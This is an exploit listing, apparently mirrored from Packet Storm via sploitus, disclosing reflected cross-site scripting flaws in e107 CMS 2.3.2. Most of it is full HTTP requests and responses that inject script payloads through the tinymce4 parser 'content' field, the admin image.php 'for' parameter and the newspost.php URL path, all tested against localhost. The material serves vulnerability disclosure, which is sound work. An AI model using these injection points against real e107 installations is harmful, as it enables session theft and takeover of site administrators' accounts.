Exploit for e107 2.3.2 Cross Site Scripting

Name: Exploit for e107 2.3.2 Cross Site Scripting
Rating: 5 (135 reviews)
2023-05-24 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:172528
# Exploit Title: e107 v2.3.2 - Reflected XSS  
# Date: 11/05/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://e107.org/  
# Software Link: https://e107.org/download  
# Version: 2.3.2  
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
### XSS Reflected - unauthorized  
  
URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php  
Parameters: content  
  
# POC  
Request:  
POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1  
Host: 127.0.0.1  
Content-Length: 1126  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: text/html, */*; q=0.01  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://127.0.0.1  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml  
  
Response:  
HTTP/1.1 200 OK  
Date: Thu, 11 May 2023 19:38:45 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29  
X-Powered-By: PHP/7.4.29  
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Content-Length: 1053  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb  
  
### XSS Reflected - Authorized  
  
URL: http://127.0.0.1/e107/e107_admin/image.php  
Parameters: for  
  
# POC 1  
Request:  
GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1  
Host: 127.0.0.1  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Connection: close  
  
Response:  
HTTP/1.1 200 OK  
Date: Thu, 04 May 2023 03:07:35 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29  
X-Powered-By: e107  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
ETag: "37f107dbe6a998ecf7b71689627c2a56"  
Content-Length: 12420  
Vary: Accept-Encoding  
X-Frame-Options: SAMEORIGIN  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
<!doctype html>  
<html lang="en">  
<head>  
<title>Media Manager - Admin Area :: hacked">bbbbb</title>  
<meta charset='utf-8' />  
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />  
<!-- *CSS* -->  
[...]  
<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">  
<p>No HTML5 support.</p>  
</div>  
[...]  
  
# POC 2  
  
URL: http://127.0.0.1/e107/e107_admin/newspost.php  
Parameters: Payload in URL  
  
Request:  
GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1  
Host: 127.0.0.1  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3  
Accept-Encoding: gzip, deflate  
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8  
Connection: close  
  
Response:  
  
  
  
  
HTTP/1.1 200 OK  
Date: Fri, 05 May 2023 06:21:53 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29  
X-Powered-By: e107  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
ETag: "d127dd6a44a22e093fed60b83bf36af2"  
Content-Length: 72914  
Vary: Accept-Encoding  
X-Frame-Options: SAMEORIGIN  
Connection: close  
Content-Type: text/html; charset=utf-8  
  
<!doctype html>  
<html lang="en">  
<head>  
<title>News - List - Admin Area :: hacked">bbbbb</title>  
<meta charset='utf-8' />  
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />  
<!-- *CSS* -->  
[...]  
<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">  
<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>  
[...]